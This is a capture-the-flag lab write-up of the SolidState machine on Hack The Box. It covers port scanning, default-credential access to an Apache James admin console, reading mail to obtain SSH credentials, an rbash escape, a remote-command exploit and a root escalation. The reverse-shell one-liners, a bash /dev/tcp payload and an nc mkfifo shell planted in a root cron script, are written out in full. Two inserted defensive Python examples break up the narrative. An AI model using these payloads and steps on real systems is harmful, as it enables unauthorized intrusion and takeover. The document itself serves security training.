SolidState (rbash escape)


Author: 天线锅仔 | Published 2022-05-31 17:58

    Disclaimer

    The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; do not use the tools and penetration ideas in this article for any illegal purpose. I bear no responsibility for any consequences arising from this, nor for any misuse or damage caused.

    Reconnaissance

    Open ports

    ┌──(root㉿ss)-[~/htb/SolidState]
    └─# nmap -p- --open --min-rate=1000 10.10.10.51 -Pn
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:59 EDT
    Nmap scan report for 10.10.10.51
    Host is up (0.0039s latency).
    Not shown: 64351 closed tcp ports (reset), 1178 filtered tcp ports (no-response)
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT     STATE SERVICE
    22/tcp   open  ssh
    25/tcp   open  smtp
    80/tcp   open  http
    110/tcp  open  pop3
    119/tcp  open  nntp
    4555/tcp open  rsip
    
    Nmap done: 1 IP address (1 host up) scanned in 16.29 seconds
    
    

    Detailed port information

    ┌──(root㉿ss)-[~/htb/SolidState]
    └─# nmap -sV -Pn -A -O 10.10.10.51 -p 22,25,80,110,119,4555
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 11:00 EDT
    Stats: 0:01:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
    Nmap scan report for 10.10.10.51
    Host is up (0.0081s latency).
    
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
    |   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
    |_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
    25/tcp   open  smtp    JAMES smtpd 2.3.2
    |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.10 [10.10.14.10]), PIPELINING, ENHANCEDSTATUSCODES
    80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
    |_http-title: Home - Solid State Security
    |_http-server-header: Apache/2.4.25 (Debian)
    110/tcp  open  pop3    JAMES pop3d 2.3.2
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_sslv2: ERROR: Script execution failed (use -d to debug)
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    119/tcp  open  nntp    JAMES nntpd (posting ok)
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_sslv2: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    4555/tcp open  rsip?
    | fingerprint-strings: 
    |   GenericLines: 
    |     JAMES Remote Administration Tool 2.3.2
    |     Please enter your login and password
    |     Login id:
    |     Password:
    |     Login failed for 
    |_    Login id:
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port4555-TCP:V=7.92%I=7%D=5/30%Time=6294DC0C%P=x86_64-pc-linux-gnu%r(Ge
    SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
    SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
    SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 80/tcp)
    HOP RTT     ADDRESS
    1   2.97 ms 10.10.14.1
    2   3.58 ms 10.10.10.51
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 246.85 seconds
    
    

    Web

    ┌──(root㉿ss)-[~/htb/SolidState]
    └─# python3 /root/dirsearch/dirsearch.py -e* -u http://10.10.10.51                                                                         
    
      _|. _ _  _  _  _ _|_    v0.4.2
     (_||| _) (/_(_|| (_| )
    
    Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492
    
    Output File: /root/dirsearch/reports/10.10.10.51/_22-05-30_11-02-56.txt
    
    Error Log: /root/dirsearch/logs/errors-22-05-30_11-02-56.log
    
    Target: http://10.10.10.51/
    
    [11:02:56] Starting: 
    [11:03:02] 200 -   17KB - /LICENSE.txt                                      
    [11:03:03] 200 -  963B  - /README.txt                                       
    [11:03:14] 200 -    7KB - /about.html                                       
    [11:03:39] 200 -    1KB - /assets/                                          
    [11:03:39] 301 -  311B  - /assets  ->  http://10.10.10.51/assets/              
    [11:04:18] 200 -    2KB - /images/                                          
    [11:04:18] 301 -  311B  - /images  ->  http://10.10.10.51/images/           
    [11:04:19] 200 -    8KB - /index.html                                       
    
    

    Port 4555

    The nmap results show that port 4555 requires a login.

    Logging in with the default credentials root:root succeeds.

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# nc -v 10.10.10.51 4555
    10.10.10.51 [10.10.10.51] 4555 (?) open
    JAMES Remote Administration Tool 2.3.2
    Please enter your login and password
    Login id:
    root
    Password:
    root
    Welcome root. HELP for a list of commands
    help
    Currently implemented commands:
    help                                    display this help
    listusers                               display existing accounts
    countusers                              display the number of existing accounts
    adduser [username] [password]           add a new user
    verify [username]                       verify if specified user exist
    deluser [username]                      delete existing user
    setpassword [username] [password]       sets a user's password
    setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
    showalias [username]                    shows a user's current email alias
    unsetalias [user]                       unsets an alias for 'user'
    setforwarding [username] [emailaddress] forwards a user's email to another email address
    showforwarding [username]               shows a user's current email forwarding
    unsetforwarding [username]              removes a forward
    user [repositoryname]                   change to another user repository
    shutdown                                kills the current JVM (convenient when James is run as a daemon)
    quit                                    close connection
    
    

    List all usernames

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# nc -v 10.10.10.51 4555                                                                                                                                                             130 ⨯
    10.10.10.51 [10.10.10.51] 4555 (?) open
    JAMES Remote Administration Tool 2.3.2
    Please enter your login and password
    Login id:
    root
    Password:
    root
    Welcome root. HELP for a list of commands
    listusers
    Existing accounts 7
    user: james
    user: ../../../../../../../../etc/bash_completion.d
    user: thomas
    user: john
    user: mindy
    

    Change john's password

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# nc -v 10.10.10.51 4555
    10.10.10.51 [10.10.10.51] 4555 (?) open
    JAMES Remote Administration Tool 2.3.2
    Please enter your login and password
    Login id:
    root
    Password:
    root
    Welcome root. HELP for a list of commands
    setpassword thomas 123456
    Password for thomas reset
    setpassword john 123456
    Password for john reset
    
    

    Log in to john's mailbox; there is one message

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# telnet 10.10.10.51 110                                                                                               1 ⨯
    Trying 10.10.10.51...
    Connected to 10.10.10.51.
    Escape character is '^]'.
    +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
    user john
    +OK
    pass 123456
    +OK Welcome john
    list
    +OK 1 743
    1 743
    .
    retr 1
    +OK Message follows
    Return-Path: <mailadmin@localhost>
    Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Delivered-To: john@localhost
    Received: from 192.168.11.142 ([192.168.11.142])
              by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
              for <john@localhost>;
              Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
    Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
    From: mailadmin@localhost
    Subject: New Hires access
    John, 
    
    Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
    
    Thank you in advance.
    
    Respectfully,
    James
    
    .
    
    

    It looks like mindy's mailbox will contain login information

    Change mindy's mailbox password and log in; there are two emails

    +OK Welcome mindy
    list
    +OK 2 1945
    1 1109
    2 836
    

    The first message

    retr 1
    +OK Message follows
    Return-Path: <mailadmin@localhost>
    Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Delivered-To: mindy@localhost
    Received: from 192.168.11.142 ([192.168.11.142])
              by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
              for <mindy@localhost>;
              Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
    Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
    From: mailadmin@localhost
    Subject: Welcome
    
    Dear Mindy,
    Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
    
    We are looking forward to you joining our team and your success at Solid State Security. 
    
    Respectfully,
    James
    

    The second message, which exposes login credentials

    retr 2
    +OK Message follows
    Return-Path: <mailadmin@localhost>
    Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Delivered-To: mindy@localhost
    Received: from 192.168.11.142 ([192.168.11.142])
              by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
              for <mindy@localhost>;
              Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
    Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
    From: mailadmin@localhost
    Subject: Your Access
    
    Dear Mindy,
    
    
    Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
    Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 
    
    username: mindy
    pass: P@55W0rd1!2@
    
    Respectfully,
    James
    
    

    Log in via SSH and get a foothold

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# ssh mindy@10.10.10.51                                                                                                                                                              255 ⨯
    mindy@10.10.10.51's password: 
    Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
    mindy@solidstate:~$ whoami
    -rbash: whoami: command not found
    
    

    Get user.txt

    mindy@solidstate:~$ ls
    bin  user.txt
    mindy@solidstate:~$ cat user.txt
    07f110ad2ba2....
    
    

    From the above we can see that we are currently in a restricted rbash shell

    mindy@solidstate:~$ echo $PATH
    /home/mindy/bin
    

    Only 3 commands are available

    mindy@solidstate:~$ ls /home/mindy/bin
    cat  env  ls
    
    

    rbash escape

    Method 1

    I learned this from 0xdf's writeup: specify bash when logging in via ssh

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 -t bash                                                  127 ⨯
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
    uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
    mindy
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 
    
    

    Method 2

    Looking at the service on port 4555, there appears to be an RCE

    ┌──(root💀kali)-[~/htb]
    └─# searchsploit JAMES Remote 2.3.2               
    
    ------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                             |  Path
    ------------------------------------------------------------------------------------------- ---------------------------------
    Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)       | linux/remote/48130.rb
    Apache James Server 2.3.2 - Remote Command Execution                                       | linux/remote/35513.py
    Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)             | linux/remote/50347.py
    ------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results
    
    

    Use 50347.py

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# python3 50347.py 10.10.10.51 10.10.16.4 443               
    [+]Payload Selected (see script for more options):  /bin/bash -i >& /dev/tcp/10.10.16.4/443 0>&1
    [+]Example netcat listener syntax to use after successful execution: nc -lvnp 443
    [+]Connecting to James Remote Administration Tool...
    [+]Creating user...
    [+]Connecting to James SMTP server...
    [+]Sending payload...
    [+]Done! Payload will be executed once somebody logs in (i.e. via SSH).
    [+]Don't forget to start a listener on port 443 before logging in!
    
    

    This exploit works by writing a bash file into the /etc/bash_completion.d directory.
    Whenever any user logs in via ssh, every file in that directory is executed as bash.
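The root cause behind the `listusers` entry `../../../../../../../../etc/bash_completion.d` and the exploit above is that the server takes a username and uses it, unvalidated, as a directory name under its user repository. The following is an added example, not code from the original writeup or from Apache James, of how a mail server should confine that path: an allow-list on the name plus a post-resolution check that the joined path is still under the repository root. The repository root and function names are assumptions for the example.

```python
"""Added example: confining a per-user mailbox directory so a username
cannot traverse out of the repository root. Not Apache James code."""
import os
import re

# Hypothetical repository root, assumed for this example.
REPO_ROOT = "/var/lib/james/users"

# Allow-list: letters, digits, dot, underscore, hyphen; no path separators,
# no leading dot, bounded length.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._-]{0,63}$")


def is_valid_username(name: str) -> bool:
    """First check: the name itself must match the allow-list."""
    return bool(USERNAME_RE.fullmatch(name)) and ".." not in name


def user_dir(name: str, root: str = REPO_ROOT) -> str:
    """Return the mailbox directory for `name`, or raise ValueError.

    Two independent checks: the allow-list on the name, and a check that the
    resolved path still lies under `root`. Either one alone would stop the
    traversal shown on the page; keeping both makes the second a safety net
    if the allow-list is ever loosened."""
    if not is_valid_username(name):
        raise ValueError(f"rejected username: {name!r}")
    root_abs = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_abs, name))
    if os.path.commonpath([root_abs, target]) != root_abs:
        raise ValueError(f"path escapes repository root: {target!r}")
    return target


def classify(names):
    """Split candidate usernames into (accepted, rejected) lists."""
    accepted, rejected = [], []
    for n in names:
        try:
            user_dir(n)
            accepted.append(n)
        except ValueError:
            rejected.append(n)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed input mirroring the `listusers` output on the page.
    sample = ["james", "../../../../../../../../etc/bash_completion.d",
              "thomas", "john", "mindy"]
    print(classify(sample))
```

Run against the five names from the `listusers` output, the traversal name is rejected by the allow-list before any path is built; the `commonpath` check only matters if a later change lets a separator through.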

    Now we listen on local port 443; a single ssh login will trigger the reverse shell

    Get the reverse shell

    ┌──(root💀kali)-[~/htb/SolidState]
    └─# nc -lnvp 443                                                                                                                    130 ⨯
    listening on [any] 443 ...
    connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 48296
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
    id
    uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
    whoami
    mindy
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 
    
    

    Privilege escalation

    Found a tmp.py file in the /opt directory (linpeas did not enumerate this file... I spent a long time looking for a privilege escalation method)

    ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls
    ls
    james-2.3.2  tmp.py
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
    cat tmp.py
    #!/usr/bin/env python
    import os
    import sys
    try:
         os.system('rm -r /tmp/* ')
    except:
         sys.exit()
    ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -alh
    ls -alh
    total 16K
    drwxr-xr-x  3 root root 4.0K Aug 22  2017 .
    drwxr-xr-x 22 root root 4.0K May 27 11:05 ..
    drwxr-xr-x 11 root root 4.0K Apr 26  2021 james-2.3.2
    -rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py
    
    

    The file's owner is root, and it looks like it periodically cleans up all files under /tmp
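The weakness here is not the script's contents but its mode: `-rwxrwxrwx` on a root-owned file that root runs on a schedule means any local user can rewrite what root executes. As an added example (not from the writeup), the auditor below flags executable files that group or others can write, and also files whose parent directory is world-writable without the sticky bit, since such a file can be replaced even when its own mode is tight. The `demo()` function builds a constructed directory layout under a temporary path that mirrors `/opt` on the page; the names and reasons are assumptions for the example.

```python
"""Added example: find privileged scripts an unprivileged user could alter.
Not part of the original writeup."""
import os
import stat
import tempfile


def writable_findings(paths):
    """Return (path, reason) pairs for executables an unprivileged user could change.

    Checks the file's own mode bits and the parent directory's mode. A sticky
    parent directory (as /tmp has) is excluded because it blocks rename and
    deletion by non-owners, so the file cannot simply be swapped out."""
    findings = []
    for p in paths:
        st = os.lstat(p)
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            findings.append((p, "symlink; target may be attacker-controlled"))
            continue
        if not (mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)):
            continue  # not executable, out of scope for this check
        if mode & stat.S_IWOTH:
            findings.append((p, "world-writable"))
        elif mode & stat.S_IWGRP:
            findings.append((p, "group-writable"))
        parent = os.path.dirname(p) or "."
        pmode = os.stat(parent).st_mode
        if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
            findings.append((p, "parent directory world-writable, file can be replaced"))
    return findings


def demo():
    """Build a constructed layout and audit it; returns {basename: [reasons]}.

    opt/tmp.py     mode 0777, like the file on the page   -> flagged
    opt/cleanup.py mode 0755, what a root cron script should look like
    scripts/job.py mode 0755 but inside a 0777 directory  -> flagged"""
    root = tempfile.mkdtemp()
    opt = os.path.join(root, "opt")
    scripts = os.path.join(root, "scripts")
    os.mkdir(opt)
    os.mkdir(scripts)
    os.chmod(opt, 0o755)
    os.chmod(scripts, 0o777)  # constructed: a world-writable directory

    body = "#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n"
    files = {
        os.path.join(opt, "tmp.py"): 0o777,
        os.path.join(opt, "cleanup.py"): 0o755,
        os.path.join(scripts, "job.py"): 0o755,
    }
    for path, mode in files.items():
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)  # chmod is not subject to umask

    result = {}
    for path, reason in writable_findings(list(files)):
        result.setdefault(os.path.basename(path), []).append(reason)
    return result


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

On a real host you would feed `writable_findings` the scripts referenced from `/etc/crontab`, `/etc/cron.*` and root's crontab; the fix for the case on the page is simply `chmod 755 /opt/tmp.py` (and confirming `/opt` itself is root-owned and `0755`, which the `ls -alh` output shows it is).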

    Replace it with the following file

    #!/usr/bin/env python
    import os
    import sys
    try:
         os.system('rm -r /tmp/* ')
         os.system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 443 >/tmp/f ')
    except:
         sys.exit()
    

    Wait a few minutes and get a root shell

    ┌──(root💀kali)-[~]
    └─# nc -lnvp 443                                                                                                 1 ⨯
    listening on [any] 443 ...
    connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 55476
    /bin/sh: 0: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    # cat /root/root.txt
    7fd6f62f8dd26e...
    # 
    
    


    Article link: https://www.haomeiwen.com/subject/wvnzprtx.html